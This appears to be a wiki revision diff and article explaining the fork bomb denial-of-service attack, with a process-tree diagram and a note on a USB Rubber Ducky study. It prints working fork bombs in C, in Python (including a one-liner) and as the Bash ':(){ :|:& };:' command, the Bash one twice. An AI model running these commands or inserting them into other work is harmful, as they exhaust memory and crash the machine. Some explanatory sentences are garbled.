Difference between revisions of "Fork bomb"
| Line 3: | Line 3: | ||
== Implementation == | == Implementation == | ||
The fork bomb utilizes the fork system call which is implemented in every programming language. The Fork command calls a child process of that executes the next line of code with it simultaneously. The mother node patiently awaits the completion of its child processes, but the child | The fork bomb utilizes the fork system call which is implemented in every programming language. The Fork command calls a child process of that executes the next line of code with it simultaneously. The mother node patiently awaits the completion of its child processes, but the child processes will never exceed their completion because they also waiting for their child processes. | ||
1| fork() L1 | 1| fork() L1 | ||
| Line 54: | Line 54: | ||
=== Forkbomb used by USB Rubber Ducky === | === Forkbomb used by USB Rubber Ducky === | ||
[[USB Rubber Ducky]] | |||
Rezky Aulia Efendy et. al. in [4] used a USB Rubber Ducky to perform the fork bomb on a windows 8 personal computer. The USB Rubber Ducky is a self-typing Keyboard disguised as an USB flash drive. Their implementation opened multiple instances of Microsoft Paint to perform the memory depletion attack. | Rezky Aulia Efendy et. al. in [4] used a USB Rubber Ducky to perform the fork bomb on a windows 8 personal computer. The USB Rubber Ducky is a self-typing Keyboard disguised as an USB flash drive. Their implementation opened multiple instances of Microsoft Paint to perform the memory depletion attack. | ||
This attack can also be Performed on Unix based Operating systems by using the Bash Command | |||
:(){ :|:& };: | |||
== References == | == References == | ||
Revision as of 08:47, 21 May 2020
The Fork Bomb (also called rabbit virus or wabbit) is a memory exhausting Denial of Service (DoS) Attack. It depletes the memory of a machine by replicating itself exponentially until all memory is used up.
Implementation
The fork bomb utilizes the fork system call which is implemented in every programming language. The Fork command calls a child process of that executes the next line of code with it simultaneously. The mother node patiently awaits the completion of its child processes, but the child processes will never exceed their completion because they also waiting for their child processes.
1| fork() L1
/ \
2| fork() L2 L2
/ \ / \
3| fork () L3 L3 L3 L3
As the code shows the processes double every line so the number of running processes increase relative to .
The following section shows some fork bomb example written in different languages.
C
#include <unistd.h>
int main(void)
{
for(;;)
fork();
return 0;
}
Python
import os while True: os.fork()
Command line variant:
python -c 'while 1: __import__("os").fork()'
Unix Bash
:(){ :|:& };:
This command line command can be deciphered like this
:() # Defines the following function ":"
{
: # Loads a copy of the function ":"
| # Redirects the Output that it is not seen in the shell
: # Loads a copy of the function ":"
& # Runs the programs as a background process
}
: # Runs the beforehand defined function ":"
This command is dangerous because the user issuing it does need any grants.
Forkbomb used by USB Rubber Ducky
USB Rubber Ducky Rezky Aulia Efendy et. al. in [4] used a USB Rubber Ducky to perform the fork bomb on a windows 8 personal computer. The USB Rubber Ducky is a self-typing Keyboard disguised as an USB flash drive. Their implementation opened multiple instances of Microsoft Paint to perform the memory depletion attack.
This attack can also be Performed on Unix based Operating systems by using the Bash Command
:(){ :|:& };:
References
[1] https://de.wikipedia.org/wiki/Forkbomb (german version for source code)
[2] https://en.wikipedia.org/wiki/Forkbomb
[3] https://www.geeksforgeeks.org/fork-system-call/
[4] IEEE: Exploring the Possibility of USB based Fork Bomb Attack on Windows Environment